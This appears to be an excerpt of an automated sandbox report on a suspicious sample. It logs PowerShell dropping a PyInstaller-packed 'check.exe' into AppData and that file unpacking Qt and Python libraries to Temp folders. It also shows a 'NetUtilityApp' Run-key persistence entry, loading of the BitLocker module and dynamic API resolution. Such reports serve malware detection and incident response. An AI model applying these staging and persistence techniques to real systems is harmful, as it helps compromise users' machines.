Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Quick.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qwebgl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\opengl32sw.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qminimal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\sip.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qtiff.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\MSVCP140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qwebp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Gui.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\MSVCP140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5DBus.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qtga.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5Quick.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5Qml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qgif.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qicns.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qico.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5QmlModels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\iconusers\qsvgicon.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qwebp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\MSVCP140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qwindows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qicns.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qminimal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5Widgets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5Gui.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5QmlModels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\iconusers\qsvgicon.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qtiff.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5DBus.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Widgets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5Svg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qgif.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qico.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qwebp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\sip.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qsvg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\MSVCP140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5DBus.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5QmlModels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platforms\qwebgl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Qml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\MSVCP140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qgif.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platforms\qwindows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qtga.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5Quick.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5Widgets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\bin\Qt5Gui.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qsvg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\opengl32sw.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\MSVCP140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qtga.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5Svg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\iconusers\qsvgicon.dll	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityApp			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityApp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

Code function: 4_2_00007FF6D92376C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

4_2_00007FF6D92376C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
